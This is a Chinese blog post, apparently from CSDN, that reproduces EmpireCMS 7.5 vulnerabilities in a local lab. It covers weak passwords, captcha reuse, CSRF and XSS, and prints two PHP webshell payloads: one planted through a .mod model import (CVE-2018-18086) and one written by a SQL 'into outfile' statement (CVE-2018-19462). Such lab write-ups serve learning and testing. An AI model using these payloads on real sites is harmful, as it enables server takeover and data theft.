帝国CMS(EmpireCMS)漏洞复现

已于 2024-06-30 20:30:54 修改
阅读量1k 收藏 12
点赞数 6
分类专栏: 漏洞复现笔记 文章标签: web安全
于 2024-06-30 18:24:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rmc131/article/details/140076994
版权

简介

《帝国网站管理系统》英文译为Empire CMS,简称Ecms,它是基于B/S结构,且功能强大而帝国CMS-logo易用的网站管理系统。
帝国CMS官网:http://www.phome.net/
参考相关漏洞分析文章,加上更详细的渗透测试过程。

参考

帝国CMS(EmpireCMS)v7.5漏洞分析
帝国cms v7.5—漏洞分析

靶场搭建

环境:PHP+Mysql+EmpireCMS<=7.5

安装phpstudy_pro

下载地址:https://www.xp.cn/
十分方便,点击下载安装即可。

安装EmpireCMS

下载地址:http://www.phome.net/download/
解压后放在phpstudy_pro/WWW目录下
与常见的靶场安装相似,访问http://127.0.0.1/upload/e/install/index.php填写相关配置信息安装即可
在这里插入图片描述
最后上删除/e/install目录,避免被再次安装.

漏洞复现

身份鉴别类

弱口令

前台可进行密码爆破,弱口令test/test@123
在这里插入图片描述

验证码失效

使用同一验证码尝试进行登录,验证码失效,故可进行上述爆破。
且存在敏感信息明文传输,数据包中用户名密码为url编码。
注册功能处同样存在此漏洞。
在这里插入图片描述
找回密码处,验证码失效,且可以无限发送密码重置邮件。
在这里插入图片描述

CSRF漏洞

修改referer依旧正常返回数据。
在这里插入图片描述

XSS漏洞

系统->备份与恢复数据->执行SQL语句,存在XSS漏洞。
在这里插入图片描述
进入商城系统,修改mainfile字段为“mainfile=javascript:alert(/xss/)”,成果弹窗。
在这里插入图片描述

会话重放漏洞

找回密码功能,可无限发送邮件,且验证码未失效。
在这里插入图片描述
在这里插入图片描述

文件上传漏洞

CVE-2018-18086()
后台,系统->管理数据表-> 导入系统模型,导入一个.php.mod文件,内容如下。
<? php file_put_contents("test.php","<?php @eval(\$_POST['hack']); ?>"); ?>
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

远程代码执行漏洞

CVE-2018-19462
系统->备份与恢复数据->执行SQL语句,用select ... into outfile语句写入php一句话木马。
select '<?php @eval($_POST[123])?>' into outfile 'C:/phpstudy_pro/WWW/EmpireCMS_7.5_SC_UTF8/getshell.php''
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

RICKC131
关注
专栏目录
帝国cms漏洞CMS7.5漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 2094
一.帝国cms漏洞简介 EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。 [帝国cms漏洞影响版本]
帝国cms7.5漏洞复现
热门推荐
cxk
05-10 2万+
EmpireCMS v7.5后台任意代码执行分析 目录 一.漏洞简介 二.漏洞复现 三.原理分析 一.漏洞简介 EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。 [影响版本] <=7.5 [漏洞危害] 高 [漏洞位置] /e/admin/admin/ebak/phome.php 二.漏洞复现 1 访问靶机192.168...
Web安全 | EmpireCMS漏洞常见漏洞分析及复现
Javachichi的博客
03-05 2148
本文将对EmpireCMS(帝国cms)的漏洞进行分析及复现
帝国cms批量自动发布工具终于搞定了,自动更新的问题也解决了,seo自动化势在必行
最新发布
baidu_23065271的博客
08-29 1268
说到帝国cms,在自动更新和自动化发布方面相对于其他cms来说,确实是难度大了一些,首先就是自动更新方面,由于它是一款生成静态页面的cms,我们也知道静态网站在自动更新方面是比较难一些的,很多时候都得人工后台去操作,其次是自动化发布也是相对难一点的,高粱seo也是研究了好久才搞定了,好在一切都非常顺利的解决了这两个问题,如今也能实现批量自动化发布和自动更新问题了。这款帝国cms自动批量发布工具实际上跟昨天的易优cms自动发布的程序结构差不多是一样的,操作都是非常简单明了,只需要根据高粱seo提供的操作说明是
帝国CMS7.5漏洞复现
m0_60411436的博客
12-15 4804
漏洞描述 帝国CMS系统,EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。该漏洞的产生,最根源的问题是没有对get,post提交方式进行严格的安全效验与过滤,导致可以插入恶意代码到后端服务器去处理,导致漏洞的发生。 本次复现需要弄到管理员权限,登陆到后台。 影响的版本:EmpireCMS V7.5 漏洞危害: 工具:御剑、bur suite、菜刀,蚁剑 漏洞复现 1、安装帝国网站管理系统 源码下载地址:帝国软件..
Web安全 EmpireCMS漏洞常见漏洞分析及复现
2401_84297796的博客
04-28 1010
点击下一步就会自动在数据库生成一个empirecms的数据库并在其中建立许多个表然后再设置进入后台管理员的密码下一步即可安装完成,这里提示要删除路径避免被再次安装,但是这个地方其实设置了两层保护,即使你访问install这个路径会有一个.off文件在路径下,需要将这个.off文件删除后才能再次安装输入设置的后台管理员用户名和密码即可进入管理员后台。
EmpireCMS4.5 渗透测试及靶场搭建(漏洞复现
Continuejww的博客
08-30 2381
成功在网站根目录写入webshell连接蚁剑目录遍历图片内的栏目信息全部都含有如上图的xss漏洞
帝国Cms7.5后台getshell | (CVE-2018-18086)漏洞复现
一醉一休的博客
09-13 3336
EmpireCMS帝国网站管理系统)是一套内容管理系统(`CMS`),EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以`实现任意代码执行`,EmpireCMS7.5版本中的/e/class/moddofun.php文件的`LoadInMod函数`存在安全漏洞,攻击者可利用该漏洞上传任意文件,该漏洞编号为`CVE-2018-18086`
帝国EmpireCMS_7.5_SC_UTF8漏洞复现
wutiangui的博客
09-13 668
然后执行:http://127.0.0.1/EmpireCMS_7.5_SC_UTF8/upload/e/install/index.php。EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名。访问备份文件目录下的config.php,将readme.txt改为config.php。进入后台,依次访问 -> [系统]-[系统设置]-[备份与恢复数据]-[备份数据]下载地址:http://www.phome.net/download/输入数据库用户名密码。
帝国CMS(EmpireCMS) v7.5 后台XSS漏洞复现与原理分析
不想当脚本小子的脚本小子
12-27 1402
一、漏洞描述 该漏洞是由于代码只使用htmlspecialchars进行实体编码过滤,而且参数用的是ENT_QUOTES(编码双引号和单引号),还有addslashes函数处理,但是没有对任何恶意关键字进行过滤,从而导致攻击者使用别的关键字进行攻击。 漏洞复现 注意看url,具体我就不说了,把upload文件中的所有文件拷贝到根目录下然后访问../e/install/index.php 一直往下顺就行,注意数据库设置这里要先在phpstudy中创建一个数据库后再连接: 浏览器访问构造的pay
2024年最全Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞(1),双非渣本网络安全四年磨一剑
2401_84263282的博客
05-05 1116
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。漏洞原理:url地址经过Request函数处理之后,把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值。
帝国CMS EmpireCMS
06-05
帝国CMS经历过16个版本更新,7.0是第17个版本。我们一直不断在实践中突破创新,现在帝国CMS 7.0又一次突破创新,采用更先进构架、更强劲内核,使系统更加高效稳定,让网站发展无后顾之忧。除了高性能的帝国CMS全新...
帝国CMS(EmpireCMS) v7.5配置文件写入漏洞分析
滴水石穿
03-12 3016
一、漏洞描述 该漏洞是由于安装程序时没有对用户的输入做严格过滤,导致用户输入的可控参数被写入配置文件,造成任意代码执行漏洞。 二、漏洞复现 1、漏洞出现位置如下图,phome_表前缀没有被严格过滤导致攻击者构造恶意的代码 2、定位漏洞出现的位置,发现在/e/install/index.php,下图可以看到表名前缀phome_,将获取表名前缀交给了mydbtbpre参数。 3、全文搜索,$mydbtbpre,然后跟进参数传递,发现将用户前端输入的表前缀替换掉后带入了sql语句进行表的创建,期间并没有对前端
帝国cms v7.5---漏洞分析
2201_76017178的博客
05-25 7435
帝国CMS漏洞分析,解析EmpireCMSv7.5存在的漏洞以及漏洞复现
帝国php漏洞,帝国cms远程代码执行漏洞-1
weixin_35033275的博客
03-18 1036
帝国cms简介:《帝国网站管理系统》英文译为"Empire CMS",简称"Ecms",它是基于B/S结构,且功能强大,帝国CMS-logo易用的网站管理系统。系统由帝国开发工作组独立开发,是一个经过完善设计的适用于Linux/windows/Unix等环境下高效的网站解决方案。这次我们将给出此系统中的两个漏洞,对漏洞原理进行分析,并将漏洞复现。一、后台数据库备份处存在代码执行漏洞1、漏洞简介:在...
帝国cms漏洞分析前台XSS漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 2012
帝国cms漏洞分析前台XSS漏洞 一、帝国cms漏洞描述 该漏洞是由于javascript获取url的参数,没有经过任何过滤,直接当作a标签和img标签的href属性和src属性输出。 二、帝国cms漏洞复现 1、需要开启会员空间功能(默认关闭),登录后台开启会员空间功能。
Table 05cq***enewsloqinfail'doesn'texist
09-02
根据提供的引用内容来看,出现了一个提示错误信息,错误信息是说Table 'empirecms.phome_ecms_'不存在。根据这个信息,我可以判断其中的Table名称应该是'05cq***enewsloqinfail'。这个错误信息表明数据库中找不到这个Table。这可能是由于数据库结构的变化或者对应的Table不存在所导致的。要解决这个问题,可以尝试以下几个步骤: 1. 首先,确认Table名称是否正确,确保没有拼写错误或者其他类似的问题。 2. 如果Table确实不存在,可以尝试重新创建这个Table。可以参考数据库的文档或者联系数据库管理员来了解如何创建这个Table。 3. 如果Table是由某个插件或者扩展程序创建的,可以尝试重新安装或者更新这个插件或者扩展程序,以确保相应的Table被正确创建。 4. 如果以上方法都没有解决问题,可以尝试恢复数据库的备份,使其回到之前正常工作的状态。 需要注意的是,这些步骤只是一些常见的解决方法,具体的解决方法可能因数据库的类型和配置而有所不同。建议在解决问题时参考相关的数据库文档或者寻求专业的数据库管理员的帮助。<span class="em">1</span> #### 引用[.reference_title] - *1* [帝国CMS刷新数据表article提示Table ‘empirecms.phome_ecms_’ doesn’t exist的解决](https://download.csdn.net/download/weixin_38660813/12896372)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RICKC131

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值